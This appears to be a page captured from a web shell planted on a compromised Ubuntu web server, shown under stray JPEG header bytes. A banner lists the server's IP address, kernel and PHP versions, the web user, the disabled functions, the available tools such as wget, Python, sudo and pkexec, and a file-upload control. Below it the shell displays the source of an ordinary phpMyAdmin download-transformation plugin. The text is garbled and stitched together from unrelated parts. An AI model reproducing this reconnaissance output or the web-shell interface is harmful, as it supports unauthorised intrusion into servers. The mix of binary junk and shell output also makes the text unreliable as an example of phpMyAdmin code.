????JFIF??x?x????'
| Server IP : 79.136.114.73 / Your IP : 216.73.216.37 Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64 User : www-data ( 33) PHP Version : 5.5.9-1ubuntu4.29 Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, MySQL : ON | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /usr/share/phpmyadmin/libraries/plugins/transformations/ |
Upload File : |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
* Application OctetStream Download Transformations plugin for phpMyAdmin
*
* @package PhpMyAdmin-Transformations
* @subpackage Download
*/
if (! defined('PHPMYADMIN')) {
exit;
}
/* Get the download transformations interface */
require_once 'abstract/DownloadTransformationsPlugin.class.php';
/**
* Handles the download transformation for application octetstream
*
* @package PhpMyAdmin-Transformations
* @subpackage Download
*/
class Application_Octetstream_Download extends DownloadTransformationsPlugin
{
/**
* Gets the plugin`s MIME type
*
* @return string
*/
public static function getMIMEType()
{
return "Application";
}
/**
* Gets the plugin`s MIME subtype
*
* @return string
*/
public static function getMIMESubtype()
{
return "OctetStream";
}
}
/**
* Function to call Application_Octetstream_Download::getInfo();
*
* Temporary workaround for bug #3783 :
* Calling a method from a variable class is not possible before PHP 5.3.
*
* This function is called by PMA_getTransformationDescription()
* in libraries/transformations.lib.php using a variable to construct it's name.
* This function then calls the static method.
*
* Don't use this function unless you are affected by the same issue.
* Call the static method directly instead.
*
* @deprecated
* @return string Info about transformation class
*/
function Application_Octetstream_Download_getInfo()
{
return Application_Octetstream_Download::getInfo();
}
?>